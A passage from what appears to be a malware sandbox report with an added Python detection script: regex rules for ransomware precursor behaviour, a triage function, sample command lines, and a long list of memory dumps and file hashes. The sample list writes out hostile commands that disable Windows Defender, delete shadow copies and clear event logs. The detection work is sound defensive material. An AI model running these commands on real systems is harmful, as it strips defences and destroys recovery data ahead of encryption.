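     rf'\bnet1?(?:\.exe)?\s+stop\s+"?{WATCHED_SERVICES}"?'),
    ("service_disabled", "T1489",
     rf'\bsc(?:\.exe)?\s+config\s+"?{WATCHED_SERVICES}"?\s+start=\s*disabled'),
    ("defender_policy", "T1562.001",
     r'\breg(?:\.exe)?\s+(?:add|delete)\s+"?HKLM\\Software\\Policies\\Microsoft\\Windows Defender'),
    ("defender_service_off", "T1562.001",  # Start=4 is SERVICE_DISABLED
     rf'\breg(?:\.exe)?\s+add\s+"?HKLM\\System\\CurrentControlSet\\Services\\{DEFENDER_SERVICES}"?\s+/v\s+"?Start"?.*/d\s+"?4\b'),
    ("defender_etw_off", "T1562.001",
     r'Autologger\\Defender\w*Logger"?\s+/v\s+"?Start"?.*/d\s+"?0\b'),
    ("defender_task_off", "T1562.001",
     r'\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+"?Microsoft\\Windows\\(?:Windows Defender|ExploitGuard).*/Disable'),
    ("defender_defs_removed", "T1562.001", r'MpCmdRun(?:\.exe)?"?\s+-RemoveDefinitions'),
    ("mppreference_disable", "T1562.001", r'Set-MpPreference\s+-Disable\w+\s+\$true'),
    ("shadow_delete", "T1490",
     r'\bvssadmin(?:\.exe)?\s+delete\s+shadows|\bwmic(?:\.exe)?\s+shadowcopy\s+delete'),
    ("eventlog_clear", "T1070.001", r'\bwevtutil(?:\.exe)?\s+cl\s+\w+'),
]
COMPILED = [(name, tech, re.compile(rx, re.IGNORECASE)) for name, tech, rx in RULES]


def match_rules(cmdline):
    """Return the (rule, technique) pairs that fire on one process command line."""
    return [(name, tech) for name, tech, rx in COMPILED if rx.search(cmdline)]


def triage(cmdlines):
    """Run every rule over a batch of command lines (e.g. one host's process
    creations in a short window) and return hits, technique counts and a verdict."""
    hits = [{"cmd": cmd, "rule": name, "technique": tech}
            for cmd in cmdlines for name, tech in match_rules(cmd)]
    techniques = Counter(h["technique"] for h in hits)
    # One hit is worth a look; three distinct techniques from one host in one
    # window is the recovery-inhibition pattern that precedes encryption.
    if len(techniques) >= 3:
        verdict = "ransomware_precursor"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"hits": hits, "techniques": dict(techniques), "verdict": verdict}


# Constructed input: command lines from this report's Processes section,
# followed by benign look-alikes that must not page anyone.
SAMPLE_CMDLINES = [
    r'net.exe stop "VSS" /y',
    r'C:\Windows\system32\net1 stop "wbengine" /y',
    r'sc.exe config "SDRSVC" start= disabled',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wmic.exe shadowcopy delete',
    r'wevtutil.exe cl security',
    r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    r'net.exe stop "Spooler" /y',
    r'vssadmin.exe list shadows',
    r'wevtutil.exe qe Security /c:5 /f:text',
    r'reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion"',
]

if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINES)
    for hit in result["hits"]:
        print(f'{hit["technique"]:10} {hit["rule"]:22} {hit["cmd"]}')
    print(result["techniques"], result["verdict"])
```

Feed it the CommandLine field of Sysmon event 1 or Security 4688 (with command-line auditing enabled) grouped per host and per few-minute window. The rules are deliberately lenient about `.exe` suffixes and quoting, because the sample mixes `net.exe stop`, `C:\Windows\system32\net1 stop` and quoted service names; in production you would also join on the parent image, since every one of these here descends from an executable in a user's Temp directory, which is itself the strongest single signal on the page.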

Network

Files

memory/3796-115-0x0000000000000000-mapping.dmp

memory/3864-116-0x0000000000000000-mapping.dmp

memory/3360-117-0x0000000000000000-mapping.dmp

memory/512-118-0x0000000000000000-mapping.dmp

memory/800-119-0x0000000000000000-mapping.dmp

memory/2220-120-0x0000000000000000-mapping.dmp

memory/2812-121-0x0000000000000000-mapping.dmp

memory/788-122-0x0000000000000000-mapping.dmp

memory/3728-123-0x0000000000000000-mapping.dmp

memory/1460-124-0x0000000000000000-mapping.dmp

memory/3516-125-0x0000000000000000-mapping.dmp

memory/480-126-0x0000000000000000-mapping.dmp

memory/2824-127-0x0000000000000000-mapping.dmp

memory/1244-128-0x0000000000000000-mapping.dmp

memory/1276-129-0x0000000000000000-mapping.dmp

memory/1236-130-0x0000000000000000-mapping.dmp

memory/2552-131-0x0000000000000000-mapping.dmp

memory/3692-132-0x0000000000000000-mapping.dmp

memory/1668-133-0x0000000000000000-mapping.dmp

memory/404-134-0x0000000000000000-mapping.dmp

memory/808-135-0x0000000000000000-mapping.dmp

memory/2232-136-0x0000000000000000-mapping.dmp

memory/1332-137-0x0000000000000000-mapping.dmp

memory/1744-138-0x0000000000000000-mapping.dmp

memory/1784-139-0x0000000000000000-mapping.dmp

memory/2044-140-0x0000000000000000-mapping.dmp

memory/2156-141-0x0000000000000000-mapping.dmp

memory/2456-142-0x0000000000000000-mapping.dmp

memory/2936-143-0x0000000000000000-mapping.dmp

memory/3036-144-0x0000000000000000-mapping.dmp

memory/1496-145-0x0000000000000000-mapping.dmp

memory/848-146-0x0000000000000000-mapping.dmp

memory/2768-147-0x0000000000000000-mapping.dmp

memory/3672-148-0x0000000000000000-mapping.dmp

memory/3524-149-0x0000000000000000-mapping.dmp

memory/3664-150-0x0000000000000000-mapping.dmp

memory/1472-151-0x0000000000000000-mapping.dmp

memory/3876-152-0x0000000000000000-mapping.dmp

memory/1888-153-0x0000000000000000-mapping.dmp

memory/2640-154-0x0000000000000000-mapping.dmp

memory/1176-155-0x0000000000000000-mapping.dmp

memory/2684-156-0x0000000000000000-mapping.dmp

memory/2756-157-0x0000000000000000-mapping.dmp

memory/2088-158-0x0000000000000000-mapping.dmp

memory/3496-159-0x0000000000000000-mapping.dmp

memory/1316-160-0x0000000000000000-mapping.dmp

memory/3676-161-0x0000000000000000-mapping.dmp

memory/2572-162-0x0000000000000000-mapping.dmp

memory/868-163-0x0000000000000000-mapping.dmp

memory/3592-164-0x0000000000000000-mapping.dmp

memory/3488-165-0x0000000000000000-mapping.dmp

memory/1044-166-0x0000000000000000-mapping.dmp

memory/332-167-0x0000000000000000-mapping.dmp

memory/3996-168-0x0000000000000000-mapping.dmp

memory/2052-169-0x0000000000000000-mapping.dmp

memory/1844-170-0x0000000000000000-mapping.dmp

memory/1988-171-0x0000000000000000-mapping.dmp

memory/2944-172-0x0000000000000000-mapping.dmp

memory/3788-173-0x0000000000000000-mapping.dmp

memory/984-174-0x0000000000000000-mapping.dmp

memory/916-175-0x0000000000000000-mapping.dmp

memory/3148-176-0x0000000000000000-mapping.dmp

memory/3184-177-0x0000000000000000-mapping.dmp

memory/2084-178-0x0000000000000000-mapping.dmp

memory/2916-179-0x00000000034C0000-0x00000000034C1000-memory.dmp

memory/2916-180-0x00000000034C0000-0x00000000034C1000-memory.dmp

memory/2916-181-0x0000000004ED0000-0x0000000004F06000-memory.dmp

memory/2916-183-0x0000000004FA2000-0x0000000004FA3000-memory.dmp

memory/2916-182-0x0000000004FA0000-0x0000000004FA1000-memory.dmp

memory/2916-184-0x0000000007A90000-0x00000000080B8000-memory.dmp

memory/2916-185-0x0000000007940000-0x0000000007962000-memory.dmp

memory/2916-186-0x0000000008130000-0x0000000008196000-memory.dmp

memory/2916-187-0x0000000008280000-0x00000000082E6000-memory.dmp

memory/2916-188-0x0000000008320000-0x0000000008670000-memory.dmp

memory/2916-189-0x0000000008200000-0x000000000821C000-memory.dmp

memory/2916-190-0x0000000008730000-0x000000000877B000-memory.dmp

memory/2916-191-0x0000000008A50000-0x0000000008AC6000-memory.dmp

memory/2916-192-0x00000000034C0000-0x00000000034C1000-memory.dmp

memory/2916-200-0x0000000007A90000-0x00000000080B8000-memory.dmp

memory/2916-201-0x00000000098A0000-0x00000000098D3000-memory.dmp

memory/2916-202-0x00000000098A0000-0x00000000098D3000-memory.dmp

memory/2916-203-0x0000000007940000-0x0000000007962000-memory.dmp

memory/2916-204-0x0000000008130000-0x0000000008196000-memory.dmp

memory/2916-205-0x0000000008280000-0x00000000082E6000-memory.dmp

memory/2916-206-0x0000000008730000-0x000000000877B000-memory.dmp

memory/2916-207-0x0000000008A50000-0x0000000008AC6000-memory.dmp

memory/2916-208-0x0000000009880000-0x000000000989E000-memory.dmp

memory/2916-213-0x00000000099E0000-0x0000000009A85000-memory.dmp

memory/2916-214-0x000000007E630000-0x000000007E631000-memory.dmp

memory/2916-215-0x0000000009BA0000-0x0000000009C34000-memory.dmp

memory/2916-284-0x0000000004FA3000-0x0000000004FA4000-memory.dmp

memory/2916-409-0x00000000075E0000-0x00000000075FA000-memory.dmp

memory/2916-414-0x00000000075E0000-0x00000000075FA000-memory.dmp

memory/2916-415-0x00000000075D0000-0x00000000075D8000-memory.dmp

memory/2916-420-0x00000000075D0000-0x00000000075D8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

memory/3412-433-0x0000000004C60000-0x0000000004C96000-memory.dmp

memory/3412-434-0x0000000007960000-0x0000000007F88000-memory.dmp

memory/3412-435-0x00000000075A0000-0x00000000075C2000-memory.dmp

memory/3412-436-0x0000000007740000-0x00000000077A6000-memory.dmp

memory/3412-437-0x0000000007820000-0x0000000007886000-memory.dmp

memory/3412-438-0x0000000008170000-0x00000000084C0000-memory.dmp

memory/3412-439-0x0000000004D00000-0x0000000004D01000-memory.dmp

memory/3412-440-0x0000000004D02000-0x0000000004D03000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a787ec6fc0706bec7496dabdc62cc9b5
SHA1 31763f89f9b5b185d382422adf8d601403e58f79
SHA256 10e0355fbfa4da168a35a5254d9c78f8e7c47840e1fd05c326617eafd9f6becc
SHA512 30c69b6787dd6ce58ad84fce8ca9e6055fcebcb319bff37c1e3122457a8922b4129818bd88439f8a5c74e3304341d8818a91deef19b2ab085d6b9e8dec3febdf

memory/3412-442-0x00000000084C0000-0x00000000084DC000-memory.dmp

memory/3412-443-0x0000000008790000-0x00000000087DB000-memory.dmp

memory/3412-444-0x0000000008860000-0x00000000088D6000-memory.dmp

memory/3412-453-0x0000000007960000-0x0000000007F88000-memory.dmp

memory/3412-454-0x00000000098D0000-0x0000000009903000-memory.dmp

memory/3412-455-0x00000000098D0000-0x0000000009903000-memory.dmp

memory/3412-456-0x00000000075A0000-0x00000000075C2000-memory.dmp

memory/3412-457-0x0000000007740000-0x00000000077A6000-memory.dmp

memory/3412-458-0x0000000007820000-0x0000000007886000-memory.dmp

memory/3412-459-0x0000000008790000-0x00000000087DB000-memory.dmp

memory/3412-461-0x00000000098B0000-0x00000000098CE000-memory.dmp

memory/3412-460-0x0000000008860000-0x00000000088D6000-memory.dmp

memory/3412-466-0x0000000009910000-0x00000000099B5000-memory.dmp

memory/3412-468-0x0000000009BB0000-0x0000000009C44000-memory.dmp

memory/3412-469-0x0000000004D03000-0x0000000004D04000-memory.dmp

memory/3412-467-0x000000007EAF0000-0x000000007EAF1000-memory.dmp

memory/3412-662-0x0000000009B70000-0x0000000009B8A000-memory.dmp

memory/3412-667-0x0000000009B70000-0x0000000009B8A000-memory.dmp

memory/3412-668-0x0000000009B60000-0x0000000009B68000-memory.dmp

memory/3412-673-0x0000000009B60000-0x0000000009B68000-memory.dmp